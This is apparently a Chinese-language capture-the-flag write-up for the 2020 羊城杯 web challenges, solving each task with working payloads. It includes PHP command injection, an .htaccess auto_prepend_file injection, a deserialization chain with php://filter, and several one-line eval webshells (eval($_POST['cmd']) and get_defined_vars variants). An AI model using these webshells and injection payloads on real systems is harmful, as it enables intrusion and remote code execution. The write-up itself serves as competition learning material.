0%

羊城杯 2020

记录一下wp

easycon

连接上蚁剑后,发现bbbbbbbbb.txt文件,base64解码保存为图片即可看到flag。

1
2
3
4
5
6
7
8
import base64
f = open(r'bbbbbbbbb.txt','r')
s = f.read()
f2 = open(r'1.txt','wb+')
flag = (base64.b64decode(s))
f2.write(flag)
f2.close()
f.close()

BlackCat

源码在

1
view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3

源码为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('谁!竟敢踩我一只耳的尾巴!');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}

echo exec("nc".$_POST['One-ear']);

原题在:

1
https://neversecure.ca/category/bug-hunting/

exp

1
2
3
http://183.129.189.60:10022/
#post提交
Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat+flag.php&White-cat-monitor=%5B%5D

easyphp

源码为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 <?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nHello, world");
?>

在网上可以找到原题:X-NUCA'2019—Ezphp

前提知识:

php.ini中有两项:

在所有页面的顶部与底部require文件

  • auto_prepend_file 在页面顶部加载文件

  • auto_append_file 在页面底部加载文件

例如:

.htaccess这个文件包含进所有的php页面

1
php_value auto_prepend_file .htaccess

然后对于stristr()的黑名单过滤直接用反斜杠即可绕过

对于后面拼接进来的"\nHello World"需要用反斜杠转义

payload

1
?content=php_value auto_prepend_fil\%0Ae .htaccess%0A%23<?php system('cat /f'.'lag');?>\&filename=.htaccess

easyser

首先访问robots.txt,提示Disallow: /star1.php/,源代码里有:

1
<!--  小胖说用个不安全的协议从我家才能进ser.php呢!  !-->

不安全协议用http访问:

1
http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/star1.php?path=http://127.0.0.1/sandbox/hrnh1cvpq4bvbm960878icaodb/ser.php

得到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';

class GWHT{
public $hero;
public function __construct(){
$this->hero = new Yasuo;
}
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
}
}
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;

}
public function hasaki(){
$d = '<?php die("nononon");?>';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
class Yasuo{
public function hasaki(){
return "I'm the best happy windy man";
}
}
?>

很明显file_put_contents是要写shell进去,并且在内容前加了死亡函数,遂构造链条,这里触发__toString,但是没有地方可以触发,盲猜应该是echo unserialize的反序列入口。构造链如下:

1
2
3
4
5
6
$GWHT = new GWHT();
$GWHT->hero = new Yongen();
$GWHT->hero->file = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php';
$GWHT->hero->text = 'PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==';
$a = serialize($GWHT);
echo $a;

payload

1
http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/star1.php?path=http://127.0.0.1/sandbox/hrnh1cvpq4bvbm960878icaodb/ser.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:77:"php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";s:4:"text";s:40:"PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==";}}

蚁剑连上在根目录/ffflag即可获得flag。

1
2
http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/shell.php
cmd

Easyphp2

首先用伪协议读取文件

1
2
http://183.129.189.60:10025/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
http://183.129.189.60:10025/?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php

源码为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>count is here</title>

<style>

html,
body {
overflow: none;
max-height: 100vh;
}
</style>
</head>

<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">

<center><img src="question.jpg" height="200" width="200" /> </center>

<?php
ini_set('max_execution_time', 5);

if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>

<h1>A Counter is here, but it has someting wrong</h1>

<form>
<input type="hidden" value="GWHT.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
<input type="submit">
</form>

<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>

</body>
</html>

首先可以用单引号嵌套反引号执行命令

1
http://183.129.189.60:10025/?file=GWHT.php&count='`ls > 1.txt`'

前提知识:

因为过滤了$_POST$_GET,需要可以用到get_defined_vars()

打印一个get_defined_vars()

1
array(4) { ["_GET"]=> array(0) { } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["pass"]=> string(4) "PASS" } ["_FILES"]=> array(0) { } } 

可以看到最外层是一个arrayarray的第一个值是_GET,如果我们在函数外层嵌套两层pos就可以获取到_GET的值了,下面就相当于一个一句话木马了。

1
eval(pos(pos(get_defined_vars())));

payload

1
http://183.129.189.60:10021/?file=GWHT.php&count='`echo "<?=eval(pos(pos(get_defined_vars())))?>">1.php`'

然后再写一个post的🐎

1
http://183.129.189.60:10021/1.php?a=file_put_contents('kkk.php', base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg=='));

又或者用next可以直接连接蚁剑

1
http://183.129.189.60:10021/?file=GWHT.php&count='`echo "<?=eval(pos(next(get_defined_vars())))?>">1.php`'